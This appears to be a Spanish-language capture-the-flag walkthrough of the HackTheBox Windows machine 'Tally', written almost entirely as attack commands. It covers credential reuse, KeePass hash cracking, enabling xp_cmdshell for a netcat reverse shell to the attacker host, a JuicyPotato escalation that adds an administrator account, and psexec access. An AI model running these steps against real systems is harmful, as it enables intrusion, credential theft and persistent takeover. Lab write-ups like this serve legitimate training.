Tally

Tally

Aug 31, 2021
HTB Windows

nmap -A -p- -oA output 10.129.1.183 —min-rate=10000 —script=vuln —script-timeout=15 -v

ssh_command.

nmap -sC -sV -O -p- -oA tally 10.129.1.183

nmap -sU -O -p- -oA tally-udp 10.129.1.183

nikto -h 10.129.1.183:80

ssh_command.

ssh_command.

ssh_command.

whatweb 10.129.1.183

ssh_command.

crackmapexec smb 10.129.1.183

ssh_command.

https://pentest-tools.com/public/sample-reports/sharepoint-scan-sample-report.pdf

ssh_command.

http://10.129.1.183/sitepages/FinanceTeam.aspx

ssh_command.

http://10.129.1.183/shared documents/forms/allitems.aspx

ssh_command.

credenciales ftp_user:UTDRSCH53c”$6hys

ssh_command.

ftp 10.129.1.183

con las credenicales de arriba

ssh_command.

curlftpfs ftp_user:”UTDRSCH53c”$6hys”@10.129.1.183 /mnt/ftp

cd !$

ll

ssh_command.

tree .

Vemos el archivo tim.kdbx

ssh_command.

Adquirimos el hash y lo ponemos en un archivo llamado hash.

keepass2john tim.kdbx

john —wordlists=/usr/share/wordlists/rockyou.txt hash

ssh_command.

Vemos el resultado ‘simplementeyo’

ssh_command.

Finance:Acc0unting

ssh_command.

smbclient -L 10.129.1.183 -U “Finance%Acc0unting”

ssh_command.

smbclient -L 10.129.1.183 -U “Finance%Acc0unting” -c “dir”

ssh_command.

mkdir /mnt/smb

mount -t cifs

mount -t cifs //10.129.1.183/ACCT /mnt/smb -o username=Finance,password=Acc0unting,domain=WORKGROUP,rw

cd /mnt/smb

ssh_command.

cd zz_Migration

cd Binaries

ssh_command.

radare2 tester.exe

aaa

ssh_command.

s main

pdf

ssh_command.

credenciales GWE3V65#6KFH93@4GWTG2G

ssh_command.

strings tester.exe | grep ‘PWD’ | tr ’;’ ‘\n’ | cat

ssh_command.

sqsh -S 10.129.1.183 -U ‘sa’

ssh_command.

sp_configure “show advanced options”, 1

reconfigure

go

sp_configure “xp_cmdshell”, 1

reconfigure

go

ssh_command.

python3 /opt/impacket/mssqlclient.py WORKGROUP/sa@10.129.1.183

ssh_command.

xp_cmdshell “\10.10.14.125\smbFolder\nc.exe -e cmd 10.10.14.125 443”

nc -lvnp 443

python3 /opt/impacket/examples/smbserver smbFolder $(pwd) -smb2support

ssh_command.

Podemos usar juicy potato

whoami /priv

ssh_command.

python3 -m http.server 80

cd C:\Windows\Temp

mkdir privesc

cd privesc

certutil.exe -f -urlcache -split http://10.10.14.125/JuicyPotato.exe juicy.exe

ssh_command.

juicy.exe =t * -l 1337 -p C:\Windows\System32\cmd.exe -a ‘/c net user cu3rv0x password123$ /add’

net user cu3rv0x

ssh_command.

C:\Windows\Temp\privesc\juicy.exe -t * -l 1337 -p C:\Windows\System32\cmd.exe -a “/c net localgroup Administrators cu3rv0x /add”

ssh_command.

C:\Windows\Temp\privesc\juicy.exe -t * -l 1337 -p C:\Windows\System32\cmd.exe -a “/c net share attacker_folder=C:\Windows\Temp /GRANT:Administrators,FULL”

ssh_command.

C:\Windows\Temp\privesc\juicy.exe -t * -l 1337 -p C:\Windows\System32\cmd.exe -a “/c reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1 /f”

ssh_command.

crackmapexec smb 10.129.1.183 -u ‘cu3rv0x’ -p ‘password123$’

ssh_command.

python3 /opt/impacket/examples/psexec.py WORKGROUP/cu3rv0x@10.129.1.183 cmd.exe

ssh_command.